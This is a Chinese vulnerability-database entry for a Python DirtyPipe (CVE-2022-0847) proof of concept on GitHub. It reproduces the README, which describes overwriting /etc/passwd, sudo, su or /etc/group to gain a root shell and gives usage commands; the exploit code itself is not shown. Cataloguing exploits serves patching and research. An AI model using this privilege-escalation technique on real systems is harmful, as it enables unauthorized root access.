漏洞平台

POC详情： bc2861c4ada75fa031c03ff68fe40f3c0d930365

来源

https://github.com/crusoe112/DirtyPipePython

关联漏洞

标题： Linux kernel 安全漏洞 (CVE-2022-0847)
描述：Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 存在安全漏洞，该漏洞源于新管道缓冲区结构的“flag”变量在 Linux 内核中的 copy_page_to_iter_pipe 和 push_pipe 函数中缺乏正确初始化。非特权本地用户利用该漏洞可以提升权限至root。以下产品和版本受到影响：Linux Kernel 5.8-5.16.11、5.8-5.15.25、5.8-5.10.102。

描述

A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell

介绍

# dirty.py

## Description
This is an exploit for the Linux kernel vulnerability [CVE-2022-0847](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847) (DirtyPipe) discovered by [Max Kellerman](https://dirtypipe.cm4all.com/).

This code combines two existing DirtyPipe POC's into one:
- [febinrev](https://github.com/febinrev/dirtypipez-exploit)
	- Overwrites sudo binary to directly pop a root shell
- [eremus-dev](https://github.com/eremus-dev/Dirty-Pipe-sudo-poc)
	- A direct copy of Kellerman's POC into Python

This code checks if:
  - /etc/passwd can be overwritten to get a root shell
  - The sudo binary can be overwritten to get a root shell
  - The su binary can be overwritten to get a root shell
  - The current user can be added to the sudo group in /etc/group

It then executes the first option that is possible in that order and drops the user directly into a root shell.

For an excellent explanation of the vulnerability itself, see [Kellerman's writeup](https://dirtypipe.cm4all.com/).

## Getting Started

Requires python 10.X for the use of os.splice

## Usage
```console
usage: dirty.py [-h] [--target {passwd,group,sudo,su}]

Use dirty pipe vulnerability to pop root shell

options:
  -h, --help            show this help message and exit
  --target {passwd,group,sudo,su}
                        The target read-only file to overwrite
```

### Examples
#### Try all targets until one works
```console
vulnerable@kali:~$ python dirty.py
```
#### Try a specific target
```console
vulnerable@kali:~$ python dirty.py --target passwd
```

## Cleanup

The script may write several files to /tmp: 
 - /tmp/backup_sudo
 - /tmp/backup_su
 - /tmp/passwd
 - /tmp/sh
 - /tmp/group

The generated files should be removed after execution, but may require root access to do so.

##  Dealing with errors

This exploit will overwrite a page of the file that resides in the page cache. It is unlikely to corrupt the actual file. If there is corruption or an error, you likely just need to wait until the page is overwritten in the cache, or restart your computer to fix any problems. That being said, I bear no responsibility for damage done by this code, so please read carefully and hack responsibly. Be sure to check out Max Kellerman's writeup at cm4all.com as well.

## Acknowledgements

- [Max Kellerman](https://dirtypipe.cm4all.com/)
- [febinrev](https://github.com/febinrev/dirtypipez-exploit)
- [eremus-dev](https://github.com/eremus-dev/Dirty-Pipe-sudo-poc)

文件快照


 [4.0K]  /data/pocs/bc2861c4ada75fa031c03ff68fe40f3c0d930365
├── [ 14K]  dirty.py
├── [1.2K]  LICENSE
└── [2.4K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。